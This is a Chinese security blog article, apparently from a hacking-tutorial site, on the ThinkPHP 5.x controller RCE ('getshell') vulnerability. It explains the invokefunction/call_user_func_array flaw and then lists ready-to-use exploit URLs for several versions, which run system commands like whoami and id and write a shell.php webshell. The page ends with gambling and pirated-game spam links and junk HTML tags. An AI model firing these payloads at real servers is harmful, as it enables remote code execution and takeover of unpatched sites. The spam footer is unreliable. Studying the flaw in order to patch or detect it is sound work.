本文来介绍一下thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧

先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell

影响的范围: 5.x < 5.1.31, <= 5.0.23

漏洞危害: 导致系统被提权(你懂的)

这里附上一个自己测试的 thinkphp的 链接  http://www.thinkphp.cn/download/1260.html  版本是5.0.22

先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类  tp5.0是没有这两个新的类的,

漏洞原理

URL:http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction

我们先来看看App类里的 exec函数里的执行分层控制器的操作

我们这里是把controller 的调用信息跟配置信息全部传到了 invokeFunction 这个 执行函数里面去了

因为think\App是第二个入口,在tp运行的时候就会被加载 所以用think\App里面的分层控制器的执行操作的时候,需要去调用invokeFunction这个函数。

这个函数有两个参数,如上图所示,第一个是函数的名字,第二个参数数组,比如$function传入BaiDu然后$vars传入[12,555]就相当于调用BaiDu(12,555)

此处我们把function传入call_user_func_array然后vars[0]传入我们要执行的函数的名字vars[1]传入要执行函数的参数,因为vars是个数组 所以此处我们的get请求需要这样写

vars[]=函数名&vars[1][]=参数

此处是利用php的数组注入

此时此刻就可以开始利用远程代码执行漏洞了 比如我们要执行system函数 他的参数是whoami

http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

下面你懂的,作为一个人我们要做的就是修复他(为所欲为?),当然官方更新的最新版本是已经修复了的

这里就代码执行成功,以下奉献上tp不同版本的payload

?s=index/\think\Request/input&filter=phpinfo&data=1
?s=index/\think\Request/input&filter=system&data=id
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=
?s=index/\think\view\driver\Php/display&content=
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持爱安网。

最新资讯
广电总局指导网络视听平台疫情期间规范开展在线教育

广电总局指导网络视听

国家广电总局指导网络视听平台疫情防控期间规范开展在
远程办公背后,腾讯会议8天扩容超过10万台云主机

远程办公背后,腾讯会议

腾讯公司公关总监张军透露,腾讯会议8天紧急扩容超过10
谈判一年终于出手 华为就12项专利侵权起诉Verizon

谈判一年终于出手 华

华为近期在美国德州地区法(tian)院(ping)提交了一份专利侵权赔偿纠
发改委:鼓励通过移动App等方式参与线上职业技能培训

发改委:鼓励通过移动A

通知提出,将提升线上职业技能培训资源质量。将充分利用
Uber重获美国加州自动驾驶路测许可 需有后备驾驶员

Uber重获美国加州自动

致命事故过去近两年后,Uber终于获批在美国加利福尼亚州
“途虎养车”回应法定代表人变更及资本金骤减

“途虎养车”回应法定

途虎养车方面向《科创板日报》记者回应称,是正常的业务
最新文章
thinkphp代码执行getshell的漏洞解决

thinkphp代码执行gets

本文来介绍一下thinkphp官方修复的一个getshell漏洞,框
SQLMAP注入检查方法 11种常见SQLMAP使用方法详解

SQLMAP注入检查方法 1

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方
Linux 下多种编程语言的反弹 shell 方法

Linux 下多种编程语言

这篇文章主要介绍了Linux 下多种反弹 shell 方法,需要
lcx端口转发详细介绍及使用方法(lcx内网转发姿势)

lcx端口转发详细介绍

这篇文章主要介绍了lcx端口转发详细介绍及使用方法(lc
lcx用法之心得总结(piracy)

lcx用法之心得总结(pi

这篇文章主要介绍了lcx用法之心得总结,需要的朋友可以
详解Filezilla server 提权

详解Filezilla server

这篇文章主要介绍了详解Filezilla server 提权,需要的
江西快3 传奇私服_中国www.6byj.com 传奇私服考查询 www.181ok.com 传奇私服 传奇私服 传奇私服 传奇私服 zzqzsh.com gotomao.com 广东11选五开奖结果查
    <samp id="cwms4"><ruby id="cwms4"></ruby></samp><wbr id="cwms4"><noscript id="cwms4"></noscript></wbr>
    <kbd id="cwms4"><noscript id="cwms4"></noscript></kbd><bdo id="cwms4"><ruby id="cwms4"></ruby></bdo>

    <ins id="cwms4"></ins>
    <code id="cwms4"></code>
    <kbd id="cwms4"></kbd>
    <ins id="cwms4"></ins>
    <table id="cwms4"></table>
  1. <samp id="cwms4"><ruby id="cwms4"></ruby></samp>

    1. <em id="cwms4"><track id="cwms4"></track></em>
    2. <霍邱县>| <柯坪县>| <渝中区>| <巫溪县>| <苏尼特左旗>| <庐江县>| <察哈>| <河津市>|